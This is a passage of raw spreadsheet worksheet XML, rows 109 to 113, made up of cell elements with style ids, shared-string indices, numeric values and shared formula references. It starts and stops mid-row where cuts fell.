      <c r="BE109" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF109" s="102"/>
      <c r="BG109" s="102"/>
      <c r="BH109" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI109" s="102"/>
      <c r="BJ109" s="102"/>
      <c r="BK109" s="102"/>
      <c r="BL109" s="102"/>
      <c r="BM109" s="103"/>
      <c r="BN109" s="103"/>
      <c r="BO109" s="103"/>
      <c r="BP109" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ109" s="83"/>
      <c r="BR109" s="83"/>
      <c r="BS109" s="83"/>
      <c r="BT109" s="83"/>
      <c r="BU109" s="83"/>
      <c r="BV109" s="83"/>
      <c r="BW109" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX109" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY109" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ109" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA109" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB109" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC109" s="85"/>
      <c r="CD109" s="85"/>
      <c r="CE109" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF109" s="85"/>
      <c r="CG109" s="85"/>
      <c r="CH109" s="85"/>
      <c r="CI109" s="85"/>
      <c r="CJ109" s="86"/>
      <c r="CK109" s="86"/>
      <c r="CL109" s="86"/>
      <c r="CM109" s="86">
        <v>0.0</v>
      </c>
      <c r="CN109" s="86"/>
      <c r="CO109" s="86"/>
      <c r="CP109" s="86"/>
      <c r="CQ109" s="86"/>
      <c r="CR109" s="86"/>
      <c r="CS109" s="86"/>
      <c r="CT109" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU109" s="88">
        <v>2002749.0</v>
      </c>
      <c r="CV109" s="88">
        <v>1.0</v>
      </c>
      <c r="CW109" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX109" s="79">
        <v>2002749.0</v>
      </c>
      <c r="CY109" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ109" s="88"/>
      <c r="DA109" s="88"/>
      <c r="DB109" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC109" s="88"/>
      <c r="DD109" s="88"/>
      <c r="DE109" s="88"/>
      <c r="DF109" s="88"/>
      <c r="DG109" s="89"/>
      <c r="DH109" s="89"/>
      <c r="DI109" s="89"/>
      <c r="DJ109" s="89">
        <v>0.0</v>
      </c>
      <c r="DK109" s="89"/>
      <c r="DL109" s="89"/>
      <c r="DM109" s="89"/>
      <c r="DN109" s="89"/>
      <c r="DO109" s="89"/>
      <c r="DP109" s="89"/>
      <c r="DQ109" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR109" s="91"/>
      <c r="DS109" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT109" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU109" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB109" s="74"/>
      <c r="EC109" s="74">
        <v>0.0</v>
      </c>
      <c r="ED109" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE109" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="110" ht="153.75" customHeight="1">
      <c r="B110" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C110" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D110" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E110" s="72" t="s">
        <v>1110</v>
      </c>
      <c r="F110" s="72" t="s">
        <v>1111</v>
      </c>
      <c r="G110" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H110" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I110" s="73" t="s">
        <v>1128</v>
      </c>
      <c r="J110" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K110" s="73" t="s">
        <v>1129</v>
      </c>
      <c r="L110" s="74">
        <v>3.0</v>
      </c>
      <c r="M110" s="74">
        <v>1.0</v>
      </c>
      <c r="N110" s="74">
        <v>1.0</v>
      </c>
      <c r="O110" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P110" s="74">
        <v>1.0</v>
      </c>
      <c r="Q110" s="74">
        <v>0.0</v>
      </c>
      <c r="R110" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S110" s="76" t="s">
        <v>1130</v>
      </c>
      <c r="T110" s="76" t="s">
        <v>1131</v>
      </c>
      <c r="U110" s="77" t="s">
        <v>1132</v>
      </c>
      <c r="V110" s="76" t="s">
        <v>1133</v>
      </c>
      <c r="W110" s="123" t="s">
        <v>1134</v>
      </c>
      <c r="X110" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y110" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z110" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA110" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB110" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC110" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD110" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE110" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF110" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG110" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH110" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI110" s="78"/>
      <c r="AJ110" s="78"/>
      <c r="AK110" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL110" s="78"/>
      <c r="AM110" s="78"/>
      <c r="AN110" s="78"/>
      <c r="AO110" s="78"/>
      <c r="AP110" s="80"/>
      <c r="AQ110" s="80"/>
      <c r="AR110" s="80"/>
      <c r="AS110" s="80">
        <v>0.0</v>
      </c>
      <c r="AT110" s="80"/>
      <c r="AU110" s="80"/>
      <c r="AV110" s="80"/>
      <c r="AW110" s="80"/>
      <c r="AX110" s="80"/>
      <c r="AY110" s="80"/>
      <c r="AZ110" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA110" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB110" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC110" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD110" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE110" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF110" s="82"/>
      <c r="BG110" s="82"/>
      <c r="BH110" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI110" s="82"/>
      <c r="BJ110" s="82"/>
      <c r="BK110" s="82"/>
      <c r="BL110" s="82"/>
      <c r="BM110" s="83"/>
      <c r="BN110" s="83"/>
      <c r="BO110" s="83"/>
      <c r="BP110" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ110" s="83"/>
      <c r="BR110" s="83"/>
      <c r="BS110" s="83"/>
      <c r="BT110" s="83"/>
      <c r="BU110" s="83"/>
      <c r="BV110" s="83"/>
      <c r="BW110" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX110" s="85" t="s">
        <v>1135</v>
      </c>
      <c r="BY110" s="85">
        <v>4.0</v>
      </c>
      <c r="BZ110" s="85">
        <v>5.0</v>
      </c>
      <c r="CA110" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB110" s="85" t="s">
        <v>1136</v>
      </c>
      <c r="CC110" s="85"/>
      <c r="CD110" s="85"/>
      <c r="CE110" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF110" s="85"/>
      <c r="CG110" s="85"/>
      <c r="CH110" s="85"/>
      <c r="CI110" s="85"/>
      <c r="CJ110" s="86"/>
      <c r="CK110" s="86"/>
      <c r="CL110" s="86"/>
      <c r="CM110" s="86">
        <v>1.0</v>
      </c>
      <c r="CN110" s="86"/>
      <c r="CO110" s="86"/>
      <c r="CP110" s="86"/>
      <c r="CQ110" s="86"/>
      <c r="CR110" s="86"/>
      <c r="CS110" s="86"/>
      <c r="CT110" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU110" s="88" t="s">
        <v>1137</v>
      </c>
      <c r="CV110" s="88">
        <v>7.0</v>
      </c>
      <c r="CW110" s="88">
        <v>13.0</v>
      </c>
      <c r="CX110" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY110" s="88" t="s">
        <v>1138</v>
      </c>
      <c r="CZ110" s="88"/>
      <c r="DA110" s="88"/>
      <c r="DB110" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC110" s="88"/>
      <c r="DD110" s="88"/>
      <c r="DE110" s="88"/>
      <c r="DF110" s="88"/>
      <c r="DG110" s="89"/>
      <c r="DH110" s="89"/>
      <c r="DI110" s="89"/>
      <c r="DJ110" s="89">
        <v>1.0</v>
      </c>
      <c r="DK110" s="89"/>
      <c r="DL110" s="89"/>
      <c r="DM110" s="89"/>
      <c r="DN110" s="89"/>
      <c r="DO110" s="89"/>
      <c r="DP110" s="89"/>
      <c r="DQ110" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR110" s="91"/>
      <c r="DS110" s="92">
        <v>40511.0</v>
      </c>
      <c r="DT110" s="93">
        <v>1.0</v>
      </c>
      <c r="DU110" s="93">
        <v>2.0</v>
      </c>
      <c r="DV110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA110" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB110" s="74"/>
      <c r="EC110" s="74">
        <v>1.0</v>
      </c>
      <c r="ED110" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE110" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="111" ht="153.75" customHeight="1">
      <c r="B111" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C111" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D111" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E111" s="72" t="s">
        <v>1139</v>
      </c>
      <c r="F111" s="72" t="s">
        <v>1140</v>
      </c>
      <c r="G111" s="72" t="s">
        <v>1141</v>
      </c>
      <c r="H111" s="72" t="s">
        <v>1142</v>
      </c>
      <c r="I111" s="73" t="s">
        <v>1143</v>
      </c>
      <c r="J111" s="73" t="s">
        <v>1144</v>
      </c>
      <c r="K111" s="73" t="s">
        <v>1145</v>
      </c>
      <c r="L111" s="74">
        <v>96.0</v>
      </c>
      <c r="M111" s="74">
        <v>1.0</v>
      </c>
      <c r="N111" s="74">
        <v>1.0</v>
      </c>
      <c r="O111" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P111" s="74">
        <v>1.0</v>
      </c>
      <c r="Q111" s="74">
        <v>0.0</v>
      </c>
      <c r="R111" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S111" s="112" t="s">
        <v>1146</v>
      </c>
      <c r="T111" s="76" t="s">
        <v>1147</v>
      </c>
      <c r="U111" s="77" t="s">
        <v>1148</v>
      </c>
      <c r="V111" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W111" s="109"/>
      <c r="X111" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y111" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z111" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA111" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB111" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC111" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD111" s="101">
        <v>1448.0</v>
      </c>
      <c r="AE111" s="78">
        <v>1.0</v>
      </c>
      <c r="AF111" s="78">
        <v>3.0</v>
      </c>
      <c r="AG111" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH111" s="101">
        <v>1448.0</v>
      </c>
      <c r="AI111" s="101"/>
      <c r="AJ111" s="101"/>
      <c r="AK111" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL111" s="101"/>
      <c r="AM111" s="101"/>
      <c r="AN111" s="101"/>
      <c r="AO111" s="101"/>
      <c r="AP111" s="80"/>
      <c r="AQ111" s="80"/>
      <c r="AR111" s="80"/>
      <c r="AS111" s="80">
        <v>1.0</v>
      </c>
      <c r="AT111" s="80"/>
      <c r="AU111" s="80"/>
      <c r="AV111" s="80"/>
      <c r="AW111" s="80"/>
      <c r="AX111" s="80"/>
      <c r="AY111" s="80"/>
      <c r="AZ111" s="81">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="BA111" s="102">
        <v>1448.0</v>
      </c>
      <c r="BB111" s="82">
        <v>1.0</v>
      </c>
      <c r="BC111" s="82">
        <v>3.0</v>
      </c>
      <c r="BD111" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE111" s="102">
        <v>1448.0</v>
      </c>
      <c r="BF111" s="102"/>
      <c r="BG111" s="102"/>
      <c r="BH111" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI111" s="102"/>
      <c r="BJ111" s="102"/>
      <c r="BK111" s="102"/>
      <c r="BL111" s="102"/>
      <c r="BM111" s="103"/>
      <c r="BN111" s="103"/>
      <c r="BO111" s="103"/>
      <c r="BP111" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ111" s="83"/>
      <c r="BR111" s="83"/>
      <c r="BS111" s="83"/>
      <c r="BT111" s="83"/>
      <c r="BU111" s="83"/>
      <c r="BV111" s="83"/>
      <c r="BW111" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX111" s="105">
        <v>1448.0</v>
      </c>
      <c r="BY111" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ111" s="85">
        <v>6.0</v>
      </c>
      <c r="CA111" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB111" s="105">
        <v>1448.0</v>
      </c>
      <c r="CC111" s="105"/>
      <c r="CD111" s="105"/>
      <c r="CE111" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF111" s="105"/>
      <c r="CG111" s="105"/>
      <c r="CH111" s="105"/>
      <c r="CI111" s="105"/>
      <c r="CJ111" s="106"/>
      <c r="CK111" s="106"/>
      <c r="CL111" s="106"/>
      <c r="CM111" s="86">
        <v>1.0</v>
      </c>
      <c r="CN111" s="86"/>
      <c r="CO111" s="86"/>
      <c r="CP111" s="86"/>
      <c r="CQ111" s="86"/>
      <c r="CR111" s="86"/>
      <c r="CS111" s="86"/>
      <c r="CT111" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU111" s="88" t="s">
        <v>1149</v>
      </c>
      <c r="CV111" s="88">
        <v>4.0</v>
      </c>
      <c r="CW111" s="88">
        <v>23.0</v>
      </c>
      <c r="CX111" s="79" t="s">
        <v>350</v>
      </c>
      <c r="CY111" s="104">
        <v>1448.0</v>
      </c>
      <c r="CZ111" s="104"/>
      <c r="DA111" s="104"/>
      <c r="DB111" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC111" s="104"/>
      <c r="DD111" s="104"/>
      <c r="DE111" s="104"/>
      <c r="DF111" s="104"/>
      <c r="DG111" s="89"/>
      <c r="DH111" s="89"/>
      <c r="DI111" s="89"/>
      <c r="DJ111" s="89">
        <v>1.0</v>
      </c>
      <c r="DK111" s="89"/>
      <c r="DL111" s="89"/>
      <c r="DM111" s="89"/>
      <c r="DN111" s="89"/>
      <c r="DO111" s="89"/>
      <c r="DP111" s="89"/>
      <c r="DQ111" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR111" s="91"/>
      <c r="DS111" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT111" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU111" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA111" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB111" s="74"/>
      <c r="EC111" s="74">
        <v>0.0</v>
      </c>
      <c r="ED111" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE111" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="112" ht="153.75" customHeight="1">
      <c r="B112" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C112" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D112" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E112" s="72" t="s">
        <v>1150</v>
      </c>
      <c r="F112" s="72" t="s">
        <v>1151</v>
      </c>
      <c r="G112" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H112" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I112" s="73" t="s">
        <v>1152</v>
      </c>
      <c r="J112" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K112" s="73" t="s">
        <v>1153</v>
      </c>
      <c r="L112" s="74">
        <v>7.0</v>
      </c>
      <c r="M112" s="74">
        <v>1.0</v>
      </c>
      <c r="N112" s="74">
        <v>1.0</v>
      </c>
      <c r="O112" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P112" s="74">
        <v>1.0</v>
      </c>
      <c r="Q112" s="74">
        <v>0.0</v>
      </c>
      <c r="R112" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S112" s="112" t="s">
        <v>938</v>
      </c>
      <c r="T112" s="76" t="s">
        <v>1154</v>
      </c>
      <c r="U112" s="77" t="s">
        <v>1155</v>
      </c>
      <c r="V112" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W112" s="109"/>
      <c r="X112" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y112" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z112" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA112" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB112" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC112" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD112" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE112" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF112" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG112" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH112" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI112" s="78"/>
      <c r="AJ112" s="78"/>
      <c r="AK112" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL112" s="78"/>
      <c r="AM112" s="78"/>
      <c r="AN112" s="78"/>
      <c r="AO112" s="78"/>
      <c r="AP112" s="80"/>
      <c r="AQ112" s="80"/>
      <c r="AR112" s="80"/>
      <c r="AS112" s="80">
        <v>0.0</v>
      </c>
      <c r="AT112" s="80"/>
      <c r="AU112" s="80"/>
      <c r="AV112" s="80"/>
      <c r="AW112" s="80"/>
      <c r="AX112" s="80"/>
      <c r="AY112" s="80"/>
      <c r="AZ112" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA112" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB112" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC112" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD112" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE112" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF112" s="82"/>
      <c r="BG112" s="82"/>
      <c r="BH112" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI112" s="82"/>
      <c r="BJ112" s="82"/>
      <c r="BK112" s="82"/>
      <c r="BL112" s="82"/>
      <c r="BM112" s="83"/>
      <c r="BN112" s="83"/>
      <c r="BO112" s="83"/>
      <c r="BP112" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ112" s="83"/>
      <c r="BR112" s="83"/>
      <c r="BS112" s="83"/>
      <c r="BT112" s="83"/>
      <c r="BU112" s="83"/>
      <c r="BV112" s="83"/>
      <c r="BW112" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX112" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY112" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ112" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA112" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB112" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC112" s="85"/>
      <c r="CD112" s="85"/>
      <c r="CE112" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF112" s="85"/>
      <c r="CG112" s="85"/>
      <c r="CH112" s="85"/>
      <c r="CI112" s="85"/>
      <c r="CJ112" s="86"/>
      <c r="CK112" s="86"/>
      <c r="CL112" s="86"/>
      <c r="CM112" s="86">
        <v>0.0</v>
      </c>
      <c r="CN112" s="86"/>
      <c r="CO112" s="86"/>
      <c r="CP112" s="86"/>
      <c r="CQ112" s="86"/>
      <c r="CR112" s="86"/>
      <c r="CS112" s="86"/>
      <c r="CT112" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU112" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV112" s="88">
        <v>2.0</v>
      </c>
      <c r="CW112" s="88">
        <v>4.0</v>
      </c>
      <c r="CX112" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY112" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ112" s="88"/>
      <c r="DA112" s="88"/>
      <c r="DB112" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC112" s="88"/>
      <c r="DD112" s="88"/>
      <c r="DE112" s="88"/>
      <c r="DF112" s="88"/>
      <c r="DG112" s="89"/>
      <c r="DH112" s="89"/>
      <c r="DI112" s="89"/>
      <c r="DJ112" s="89">
        <v>0.0</v>
      </c>
      <c r="DK112" s="89"/>
      <c r="DL112" s="89"/>
      <c r="DM112" s="89"/>
      <c r="DN112" s="89"/>
      <c r="DO112" s="89"/>
      <c r="DP112" s="89"/>
      <c r="DQ112" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR112" s="91"/>
      <c r="DS112" s="92">
        <v>12449.0</v>
      </c>
      <c r="DT112" s="93">
        <v>1.0</v>
      </c>
      <c r="DU112" s="93">
        <v>2.0</v>
      </c>
      <c r="DV112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB112" s="74"/>
      <c r="EC112" s="74">
        <v>1.0</v>
      </c>
      <c r="ED112" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE112" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="113" ht="153.75" customHeight="1">
      <c r="B113" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C113" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D113" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E113" s="72" t="s">
        <v>1156</v>
      </c>
      <c r="F113" s="72" t="s">
        <v>1157</v>
      </c>
      <c r="G113" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H113" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I113" s="73" t="s">
        <v>1158</v>
      </c>
      <c r="J113" s="73" t="s">
        <v>1159</v>
      </c>
      <c r="K113" s="73" t="s">
        <v>1160</v>
      </c>
      <c r="L113" s="74">
        <v>10.0</v>
      </c>
      <c r="M113" s="74">
        <v>1.0</v>
      </c>
      <c r="N113" s="74">
        <v>1.0</v>
      </c>
      <c r="O113" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P113" s="74">
        <v>1.0</v>
      </c>
      <c r="Q113" s="74">
        <v>0.0</v>
      </c>
      <c r="R113" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S113" s="112" t="s">
        <v>1161</v>
      </c>
      <c r="T113" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U113" s="77" t="s">
        <v>1162</v>
      </c>
      <c r="V113" s="76" t="s">
        <v>1163</v>
      </c>
      <c r="W113" s="76" t="s">
        <v>1164</v>
      </c>
      <c r="X113" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y113" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z113" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA113" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB113" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC113" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD113" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE113" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF113" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG113" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH113" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI113" s="78"/>
      <c r="AJ113" s="78"/>
      <c r="AK113" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL113" s="78"/>
      <c r="AM113" s="78"/>
      <c r="AN113" s="78"/>
      <c r="AO113" s="78"/>
      <c r="AP113" s="80"/>
      <c r="AQ113" s="80"/>
      <c r="AR113" s="80"/>
      <c r="AS113" s="80">
        <v>0.0</v>
      </c>
      <c r="AT113" s="80"/>
      <c r="AU113" s="80"/>
      <c r="AV113" s="80"/>
      <c r="AW113" s="80"/>
      <c r="AX113" s="80"/>
      <c r="AY113" s="80"/>
      <c r="AZ113" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA113" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB113" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC113" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD113" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE113" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF113" s="82"/>
      <c r="BG113" s="82"/>
      <c r="BH113" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI113" s="82"/>
      <c r="BJ113" s="82"/>
      <c r="BK113" s="82"/>
      <c r="BL113" s="82"/>
      <c r="BM113" s="83"/>
      <c r="BN113" s="83"/>
      <c r="BO113" s="83"/>
      <c r="BP113" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ113" s="83"/>
      <c r="BR113" s="83"/>
      <c r="BS113" s="83"/>
      <c r="BT113" s="83"/>
      <c r="BU113" s="83"/>
      <c r="BV113" s="83"/>
      <c r="BW113" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX113" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY113" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ113" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA113" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB113" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC113" s="85"/>
      <c r="CD113" s="85"/>
      <c r="CE113" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF113" s="85"/>
      <c r="CG113" s="85"/>
      <c r="CH113" s="85"/>
      <c r="CI113" s="85"/>
      <c r="CJ113" s="86"/>
      <c r="CK113" s="86"/>
      <c r="CL113" s="86"/>
      <c r="CM113" s="86">
        <v>0.0</v>
      </c>
      <c r="CN113" s="86"/>
      <c r="CO113" s="86"/>
      <c r="CP113" s="86"/>
      <c r="CQ113" s="86"/>
      <c r="CR113" s="86"/>
      <c r="CS113" s="86"/>
      <c r="CT113" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU113" s="88" t="s">
        <v>192</v>
      </c>
      <c r="CV113" s="88">
        <v>3.0</v>
      </c>
      <c r="CW113" s="88">
        <v>7.0</v>
      </c>
      <c r="CX113" s="79" t="s">
        <v>192</v>
      </c>
      <c r="CY113" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ113" s="88"/>
      <c r="DA113" s="88"/>
      <c r="DB113" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC113" s="88"/>
      <c r="DD113" s="88"/>
      <c r="DE113" s="88"/>
      <c r="DF113" s="88"/>
      <c r="DG113" s="89"/>
      <c r="DH113" s="89"/>
      <c r="DI113" s="89"/>
      <c r="DJ113" s="89">
        <v>0.0</v>
      </c>
      <c r="DK113" s="89"/>
      <c r="DL113" s="89"/>
      <c r="DM113" s="89"/>
      <c r="DN113" s="89"/>
      <c r="DO113" s="89"/>
      <c r="DP113" s="89"/>
      <c r="DQ113" s="90">
